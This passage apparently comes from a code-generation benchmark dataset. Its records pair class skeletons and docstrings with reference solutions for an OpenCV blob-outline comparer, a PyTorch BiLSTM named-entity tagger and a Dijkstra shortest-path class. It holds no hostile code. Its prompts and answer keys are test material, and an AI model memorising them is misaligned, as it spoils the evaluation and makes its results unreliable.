input_curve.size)\nref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\nnew_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\nnew_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\nnew_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\nmean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\nself.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\nreturn mean_dist.min()", "areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\nassert areas_num == 2, 'Multiple blobs in mask'\ncontours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncontour = np.squeeze(np.vstack(contours))\ncentroid_uv = vt.uv_centroid(mask)\nself._centroid_vectors = contour - centroid_uv\nreturn np.linalg.norm(self._centroid_vectors, axis=1)"], "bodies_text": "<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "OutlineComparer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000311", "length_bytes": 22952, "license_type": "no_license", "methods": [{"docstring": "Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray", "name": "__init__", "signature": "def __init__(self, training_mask)"}, {"docstring": "Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float", "name": "outline_distance", "signature": "def outline_distance(self, query_mask)"}, {"docstring": "Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray", "name": "_calc_dist_curve", "signature": "def _calc_dist_curve(self, mask)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001374", "prompt": "Implement the Python class `OutlineComparer` described below.\n\nClass description:\nImplement the OutlineComparer class.\n\nMethod signatures and docstrings:\n- def __init__(self, training_mask): Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\n- def outline_distance(self, query_mask): Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\n- def _calc_dist_curve(self, mask): Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray", "prompted_full_text": "Implement the Python class `OutlineComparer` described below.\n\nClass description:\nImplement the OutlineComparer class.\n\nMethod signatures and docstrings:\n- def __init__(self, training_mask): Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\n- def outline_distance(self, query_mask): Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\n- def _calc_dist_curve(self, mask): Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\n\n<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "revision_id": "457d839a4ae5401c76a46616c622f2728f56f25b", "skeleton": "<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OutlineComparer:\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n", "source": "the_stack_v2_python_sparse", "source_path": "AdvancedVisionTools.py", "source_repo": "AndersDHenriksen/Vision", "split": "test", "star_events_count": 0} {"blob_id": "cd2ec1b23043295195dbac9f687b99f2f27efad6", "bodies": ["super(NerBiLstmModel, self).__init__()\nself.config = config\nself._max_length = min(config.max_length, helper.max_length)\nself._dropout = torch.nn.Dropout(config.dropout)\nself._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\nself._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\nself._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)", "batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\nsentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\nsentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\nsentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\nnerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\nnerbilstm_dropout_output = self._dropout(nerbilstm_output)\nlinear_output = self._hidden2tag(nerbilstm_dropout_output)\ntag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\nreturn tag_probs"], "bodies_text": "<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "class_docstring": "Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.", "class_name": "NerBiLstmModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000312", "length_bytes": 20493, "license_type": "no_license", "methods": [{"docstring": "TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation", "name": "__init__", "signature": "def __init__(self, helper, config, pretrained_embeddings)"}, {"docstring": "TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep", "name": "forward", "signature": "def forward(self, sentences)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004670", "prompt": "Implement the Python class `NerBiLstmModel` described below.\n\nClass description:\nImplements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\n\nMethod signatures and docstrings:\n- def __init__(self, helper, config, pretrained_embeddings): TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\n- def forward(self, sentences): TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep", "prompted_full_text": "Implement the Python class `NerBiLstmModel` described below.\n\nClass description:\nImplements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\n\nMethod signatures and docstrings:\n- def __init__(self, helper, config, pretrained_embeddings): TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\n- def forward(self, sentences): TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\n\n<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "revision_id": "b15acc98448341802562d1ccb43924c97560d530", "skeleton": "<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n", "source": "the_stack_v2_python_sparse", "source_path": "nlp-hw3/Code/q5/ner_bilstm_model.py", "source_repo": "AvivYaniv/Natural-Language-Processing", "split": "test", "star_events_count": 3} {"blob_id": "5b4e24d6440b2c99c0d6c73619dd7000195279b6", "bodies": ["self.graph = graph\nself.nodes_heap = self.create_nodes_heap(graph)\nself.src = self.nodes_heap[self.nodes_heap.index(src)]\nself.dest = self.nodes_heap[self.nodes_heap.index(dest)]\nself.src.distance = 0\nheapify(self.nodes_heap)", "min_heap = []\nfor label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\nreturn min_heap", "if self.dest.distance == float('inf'):\n self.build_shortest_path()\nreturn self.dest.distance", "if self.dest.distance == float('inf'):\n self.build_shortest_path()\ncurrent_node = self.dest\npath = [current_node.label]\nwhile current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\npath.reverse()\nreturn path", "while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)"], "bodies_text": "<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "class_docstring": "", "class_name": 